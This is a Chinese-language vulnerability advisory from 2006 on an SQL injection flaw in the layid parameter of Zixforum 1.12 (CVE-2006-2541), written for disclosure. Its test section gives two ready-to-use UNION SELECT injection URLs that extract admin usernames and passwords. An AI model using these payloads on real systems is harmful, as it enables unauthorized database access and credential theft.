Zixforum layid变量远程SQL注入漏洞
发布日期:2006-05-20
更新日期:2006-05-20
受影响系统:Zixforum Zixforum 1.12
描述:
BUGTRAQ ID:
18043
CVE(CAN) ID:
CVE-2006-2541
Zixforum是一款基于WEB的ASP编写的网络论坛程序。
Zixforum对用户提交给的参数缺少正确充分的过滤,远程攻击者可以利用此漏洞非授权操作数据库。
Zixforum的main.asp和login.asp脚本对用户提交layid参数数据缺少充分过滤,远程攻击者可以通过在输入数据中插入特定的SQL命令来非授权获取对数据库的访问。
<**>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://[target]/zix/login.asp?layid=-1%20union%20select%201,null,null,1,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,1,null%20from%20adminLogins where approve=1 and '1'='1'
http://[target]/zix/main.asp?layid=-1%20union%20select%201,null,null,null,1,1,1,null,1,1,J_User,null,1,1,1,1,1,J_Pass,null,null,null,null,1,1,1,1,1,1,1,1,1,1,1,1,1,null,null%20from%20adminLogins where approve=1 and '1'='1'
建议:
厂商补丁:
Zixforum
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.zixforum.com/v2/浏览次数:2601
严重程度:0(网友投票)